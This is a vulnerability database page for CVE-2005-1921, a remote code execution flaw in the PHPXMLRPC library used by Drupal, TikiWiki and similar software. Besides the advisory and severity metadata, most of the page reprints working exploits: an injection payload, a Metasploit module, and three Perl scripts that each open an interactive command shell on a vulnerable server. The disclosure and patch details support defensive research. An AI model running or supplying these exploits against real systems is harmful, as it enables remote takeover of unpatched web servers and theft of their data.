Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Metrics
Metric |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 43829
Publication date : 2015-07-01 22:00 +00:00
Author : GulfTech Security
EDB Verified : No
PHPXMLRPC Remote Code Execution
Vendor: Useful Information Inc.
Product: PHPXMLRPC
Version: <= 1.1
Website: http://phpxmlrpc.sourceforge.net/
BID: 14088
CVE: CVE-2005-1921
OSVDB: 17793
SECUNIA: 15852
PACKETSTORM: 38394
Description:
PHPXMLRPC aka XML-RPC For PHP is a PHP implementation of the XML-RPC web RPC protocol, and was originally developed by Edd Dumbill of Useful Information Company. As of the 1.0 stable release, the project has been opened to wider involvement and moved to SourceForge. PHPXMLRPC is used in a large number of popular web applications such as PostNuke, Drupal, b2evolution, and TikiWiki. Unfortunately PHPXMLRPC is vulnerable to a remote php code execution vulnerability that may be exploited by an attacker to compromise a vulnerable system.
Remote Code Execution:
PHPXMLRPC is vulnerable to a very high risk remote php code execution vulnerability that may allow for an attacker to compromise a vulnerable webserver. The vulnerability is the result of unsanatized data being passed directly into an eval() call in the parseRequest() function of the XMLRPC server.
// decompose incoming XML into request structure
xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, true);
xml_set_element_handler($parser, "xmlrpc_se", "xmlrpc_ee");
xml_set_character_data_handler($parser, "xmlrpc_cd");
xml_set_default_handler($parser, "xmlrpc_dh");
if (!xml_parse($parser, $data, 1)) {
// return XML error as a faultCode
$r=new xmlrpcresp(0,
$xmlrpcerrxml+xml_get_error_code($parser),
sprintf("XML error: %s at line %d",
xml_error_string(xml_get_error_code($parser)),
xml_get_current_line_number($parser)));
xml_parser_free($parser);
} else {
xml_parser_free($parser);
$m=new xmlrpcmsg($_xh[$parser]['method']);
// now add parameters in
$plist="";
for($i=0; $i\n";
$plist.="$i - " . $_xh[$parser]['params'][$i]. " \n";
eval('$m->addParam(' . $_xh[$parser]['params'][$i]. ");");
}
By creating an XML file that uses single quotes to escape into the eval() call an attacker can easily execute php code on the target server. This has a lot to do with the fact that magic_quotes_gpc() does not apply to $HTTP_RAW_POST_DATA so using single quotes is not a problem.
test.method
','')); phpinfo(); exit;/*
The above xml file when posted to the vulnerable server will cause the phpinfo() function call to be executed on the vulnerable server.
Solution:
An updated version of PHPXMLRPC can be downloaded from their official website, and all users are advised to upgrade immediately.
http://sourceforge.net/project/showfiles.php?group_id=34455&package_id=26601
A special thanks to Ed Dumbill, Giunta Gaetano, and all of the other people that helped get this fix out, and all of the people who helped us try and track down developers who were using this third party XMLRPC library.
Credits:
James Bercegay of the GulfTech Security Research Team
Exploit Database EDB-ID : 16882
Publication date : 2010-07-24 22:00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
# XXX This module needs an overhaul
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP XML-RPC Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
},
'Author' => [ 'hdm', 'cazz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
['CVE', '2005-1921'],
['OSVDB', '17793'],
['BID', '14088'],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Payload' => {
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2005'
))
register_options(
[
OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
], self.class)
deregister_options(
'HTTP::junk_params', # not your typical POST, so don't inject params.
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
)
end
def go(command)
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
wrapper = rand_text_alphanumeric(rand(128)+32)
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
xml =
'' +
"
" +
""+ rand_text_alphanumeric(rand(128)+32) + "" +
"" +
"" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//" +
"" + rand_text_alphanumeric(rand(128)+32) + "" +
"" +
"";
res = send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'POST',
'ctype' => 'application/xml',
'data' => xml,
}, 5)
if (res and res.body)
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
return nil
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
response = go(payload.encoded)
if response == nil
print_error('exploit failed: no response')
else
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
end
Exploit Database EDB-ID : 1078
Publication date : 2005-06-30 22:00 +00:00
Author : ilo--
EDB Verified : Yes
# tested and working /str0ke
#!/usr/bin/perl
#
# ilo--
#
# This program is no GPL or has nothing to do with FSF, but some
# code was ripped from romansoft.. sorry, too lazy!
#
# xmlrpc bug by James from GulfTech Security Research.
# http://pear.php.net/bugs/bug.php?id=4692
# xmlrpc drupal exploit, but James sais xoops, phpnuke and other
# cms should be vulnerable.
#
# greets: dsr! digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1; # fflush stdout after print
# Default options
# connection
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;
# general
my $host;
#informational lines to feed my own ego.
print "xmlrpc exploit - http://www.reversing.org \n";
print "2005 ilo--
\n";
print "special chars allowed are / and - \n\n";
# read command line options
my $options = GetOptions (
#general options
'host=s' => \$host, # input host to test.
# connection options
'basic_auth_user=s' => \$basic_auth_user,
'basic_auth_pass=s' => \$basic_auth_pass,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'timeout=i' => \$conn_timeout);
# command line sanity check
&show_usage unless ($host);
# main loop
while (1){
print "\nxmlrpc@# ";
my $cmd = ;
xmlrpc_xploit ($cmd);
}
exit (1);
#exploit
sub xmlrpc_xploit {
chomp (my $data = shift);
my $reply;
my $d1 = "examples.getStateNamea');";
my $d2 = ";//xml exploit R/01";
$data =~ s/-/'.chr(45).'/mg;
$data =~ s/\//'.char(47).'/mg;
my $req = new HTTP::Request 'POST' => $host;
$req->content_type('application/xml');
$req->content($d1.'system(\''.$data.'\')'.$d2);
my $ua = new LWP::UserAgent;
$ua->agent("xmlrpc exploit R/0.1");
$ua->timeout($conn_timeout);
if ($basic_auth_user){
$req->authorization_basic($basic_auth_user, $basic_auth_pass)
}
if ($proxy){
$ua->proxy(['http'] => $proxy);
$req->proxy_authorization_basic($proxy_user, $proxy_pass);
}
#send request, return null if not OK
my $res = $ua->request($req);
if ($res->is_success){
$reply= $res->content;
} else {
$reply = "";
}
$reply =~ /(.*).(warning.*)/mgsi;
print ($1);
}
# show options
sub show_usage {
print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
print "main options\n";
print "connection options\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--basic_auth_user, --basic_auth_pass\n";
print "\t--timeout \n";
print "\nExample\n";
print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
print "\n";
exit(1);
}
# milw0rm.com [2005-07-01]
Exploit Database EDB-ID : 1083
Publication date : 2005-07-03 22:00 +00:00
Author : dukenn
EDB Verified : Yes
#-------------------------------------------------------#
# /| #
# | | #
# | | #
# /\ ________| |___ #
# / \ \_______ __/ #
# / \|\_____ | | _ _ _ _ ()___ #
# / /\ \ ___ \ | |<_> / | | | || \ || | | | #
# / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| #
# / ______ \ | || || | / | | | || \ || | | #
# / / \ \ | || || | / |_ |_ |_|| \|| | \_| #
# \_/ |\_/ | || || | ___ _ _ #
# | | | || /| | | | | ||\/| #
# \| \||/ \| | |_ |_|| | #
# | | | || | #
# | |_ | || | #
# #
# Original advisory by http://gulftech.org/ #
# Exploit coded by dukenn (http://asteam.org) #
# #
#-------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";
if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$xml = $ARGV[1];
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
while (1) {
print '['.$host.']# ';
$cmd =
;
chop($cmd);
last if ($cmd eq 'exit');
$xmldata = "test.method',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*";
print $sock "POST ".$xml." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: text/xml\n";
print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
$good=0;
while ($ans = <$sock>)
{
if ($good == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $good = 1; }
}
if ($good==0) {print "Exploit Failed\n";exit();}
}
}
else {
print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
exit;
}
# milw0rm.com [2005-07-04]
Exploit Database EDB-ID : 1084
Publication date : 2005-07-03 22:00 +00:00
Author : Mike Rifone
EDB Verified : Yes
#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************
use LWP::UserAgent;
$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");
$host = $ARGV[0];
if ( !$host )
{
die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
}
while ( $host )
{
print "xmlrpc\@\#";
$exec =
;
$data = "foo.bar1111','')); system('$exec'); die; /*";
$send = new HTTP::Request POST => $host;
$send->content($data);
$gots = $brws->request($send);
$show = $gots->content;
if ( $show =~ /([\d]{1,10})<\/b>
(.*)/is )
{
print $2 . "\n";
}
else
{
print "$show\n";
}
}
# milw0rm.com [2005-07-04]
Products Mentioned
Configuraton 0
Php>>Xml_rpc >> Version To (including) 1.3.0
Configuraton 0
Gggeek>>Phpxmlrpc >> Version To (including) 1.1
Configuraton 0
Drupal>>Drupal >> Version To (excluding) 4.5.4
Drupal>>Drupal >> Version From (including) 4.6.0 To (excluding) 4.6.2
Configuraton 0
Tiki>>Tikiwiki_cms\/groupware >> Version To (excluding) 1.8.5
Configuraton 0
Debian>>Debian_linux >> Version 3.1
References